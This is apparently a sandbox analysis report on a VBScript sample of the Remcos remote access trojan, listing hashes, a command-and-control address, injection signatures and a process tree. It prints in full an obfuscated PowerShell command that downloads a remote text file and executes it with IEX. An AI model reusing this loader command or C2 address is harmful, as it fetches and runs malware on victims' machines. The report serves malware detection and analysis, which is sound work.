Analysis
- Max time kernel: 150s
- Max time network: 144s
- Platform: windows7_x64
- Resource: win7v20210410
- Submitted: 21-04-2021 17:11
- Static task: static1
- Behavioral task: behavioral1
- Sample: 2.vbs
- Resource: win7v20210410
General
- Target: 2.vbs
- Size: 662B
- MD5: 8da164753530662b1f603f7b23413223
- SHA1: 18a3665edcb3b3d3c53f9755bc225569a64ae642
- SHA256: b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
- SHA512: b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
- Extracted family: remcos
- Extracted address: 194.5.97.183:8888
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
  flow  pid   process
  7     2032  powershell.exe
  9     2032  powershell.exe
  11    2032  powershell.exe
  13    2032  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description                          pid   process         target process
  PID 1672 set thread context of 1628  1672  powershell.exe  aspnet_regbrowsers.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (29 IoCs)
  Processes:
  pid   process         events
  2032  powershell.exe  2
  1672  powershell.exe  27
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description              pid   process
  Token: SeDebugPrivilege  2032  powershell.exe
  Token: SeDebugPrivilege  1672  powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
  pid   process
  1628  aspnet_regbrowsers.exe
- Suspicious use of WriteProcessMemory (39 IoCs)
  Processes:
  description                       pid   process         target process          events
  PID 368 wrote to memory of 2032   368   WScript.exe     powershell.exe          3
  PID 2032 wrote to memory of 1672  2032  powershell.exe  powershell.exe          3
  PID 1672 wrote to memory of 708   1672  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1672 wrote to memory of 1124  1672  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1672 wrote to memory of 1004  1672  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1672 wrote to memory of 1344  1672  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1672 wrote to memory of 1972  1672  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1672 wrote to memory of 1628  1672  powershell.exe  aspnet_regbrowsers.exe  13
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 6e9a7aa8321f264772ea32e4d912cbda
  SHA1: 06c8aa1f7a5698f32bcd36e61a10cdd218880232
  SHA256: 21069802d40e4ae283ea9289b827580d12f000c408b769a051dc430c956f8519
  SHA512: da47bbe8f12998993312f9a40a4d84476f5abcf7cd4bb90014fbf4461cf078261ef7fd899828d35b2d81b00202b7bc9295464969ff58fb28ddd629f480a73cbd
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: b870fb4c34b3de2001a769fcebdda51c
  SHA1: 649bfed97cfbccbbc57516f62b30dea0a8e3547a
  SHA256: 15ae9f521efdf58238619bb7cd2a2a0ab4c3097a52e7ca7b67c249baaa653de8
  SHA512: 1f9778b71144f1f7403158cfa4b5fe1f87f971cd7c5ca1e13ea12411f90130f1bd1be89ee2c77f3e50f20bbef055de153c616b5b2bc28213c7ffa5d4fe9f208c
- C:\Users\Public\ Microsoft.ps1
  MD5: b5795726bb04f5f9584184ae1f50777b
  SHA1: 91b250e76c41066a009b70200c5254a40980228b
  SHA256: 5d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
  SHA512: 10ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb
- memory/368-59-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp (Filesize 8KB)
- memory/1628-88-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
- memory/1628-87-0x0000000076661000-0x0000000076663000-memory.dmp (Filesize 8KB)
- memory/1628-86-0x000000000042EEEF-mapping.dmp
- memory/1628-85-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
- memory/1672-70-0x0000000000000000-mapping.dmp
- memory/1672-77-0x000000001A9F0000-0x000000001A9F2000-memory.dmp (Filesize 8KB)
- memory/1672-78-0x000000001A9F4000-0x000000001A9F6000-memory.dmp (Filesize 8KB)
- memory/1672-82-0x0000000002690000-0x00000000026A8000-memory.dmp (Filesize 96KB)
- memory/2032-69-0x000000001B920000-0x000000001B921000-memory.dmp (Filesize 4KB)
- memory/2032-68-0x000000001B850000-0x000000001B851000-memory.dmp (Filesize 4KB)
- memory/2032-67-0x0000000001D90000-0x0000000001D91000-memory.dmp (Filesize 4KB)
- memory/2032-66-0x000000001ABA4000-0x000000001ABA6000-memory.dmp (Filesize 8KB)
- memory/2032-65-0x000000001ABA0000-0x000000001ABA2000-memory.dmp (Filesize 8KB)
- memory/2032-64-0x0000000001F10000-0x0000000001F11000-memory.dmp (Filesize 4KB)
- memory/2032-63-0x000000001AC20000-0x000000001AC21000-memory.dmp (Filesize 4KB)
- memory/2032-62-0x0000000001D50000-0x0000000001D51000-memory.dmp (Filesize 4KB)
- memory/2032-60-0x0000000000000000-mapping.dmp